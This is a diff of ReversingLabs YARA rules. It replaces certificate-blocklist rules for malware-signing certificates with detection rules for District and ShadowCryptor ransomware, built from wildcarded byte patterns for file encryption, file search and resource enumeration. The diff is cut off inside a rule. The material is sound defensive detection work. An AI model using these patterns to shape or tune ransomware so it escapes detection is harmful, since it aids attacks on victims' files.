+            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
+            89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04
+            33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75
+            ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ??
+            6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B
+            45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ??
+            ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and ( pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures [ i ] . serial == "9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" ) and 1592363914 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects District ransomware."
 		author = "ReversingLabs"
-		id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "fc6abbc7-66f9-56e6-8106-5f360f25b092"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4364-L4382"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.District.yara#L1-L194"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "District"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
+            24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
+            24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ??
+            C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ??
+            ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D
+            44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
+            24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24
+            ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ??
+            8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5
+            ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56
+            53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A
+            ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ??
+            ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
+            FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51
+            0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74
+            24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0
+            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ??
+            72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66
+            89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24
+            ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24
+            ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF
+            74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files = {
+            53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ??
+            ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74
+            ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D
+            5B C2
+        }
+		$enum_resources_1_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
+            ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D
+            ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89
+            6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1
+            E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D
+            50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A
+        }
+		$enum_resources_1_p2 = {
+            8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ??
+            F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66
+            A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
+            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
+            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ??
+            89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ??
+            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6
+        }
+		$enum_resources_1_p3 = {
+            C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ??
+            ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D
+            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74
+        }
+		$enum_resources_2_p1 = {
+            8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
+            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ??
+            74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
+            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ??
+            8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ??
+            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
+            66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C
+            24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89
+            41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ??
+            ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A
+            41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2
+            ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
+            A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ??
+            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+        }
+		$enum_resources_2_p2 = {
+            01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D
+            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49
+            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7
+            C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79
+            ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ??
+            ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0
+            75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01
+            41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D
+        }
+		$enum_resources_2_p3 = {
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2
+            8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B
+            CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C
+            24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74
+            ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75
+            ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47
+            84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D
+            70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ??
+            83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ??
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA
+        }
+		$enum_resources_2_p4 = {
+            8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ??
+            66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85
+            C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66
+            8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ??
+            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9
+            ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D
+            8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B
+            6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ??
+            72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ??
+            8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) and 1594590024 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $find_files ) and ( all of ( $enum_resources_1_p* ) ) and ( all of ( $enum_resources_2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ShadowCryptor ransomware."
 		author = "ReversingLabs"
-		id = "6a1e5115-ac72-57a3-8418-7c81f38f76af"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "983e8927-4829-540f-9697-886226fd54ce"
+		date = "2021-02-11"
+		modified = "2021-02-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4384-L4400"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ShadowCryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ??
+            8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D
+            ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
+            ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ??
+            33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B
+            F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
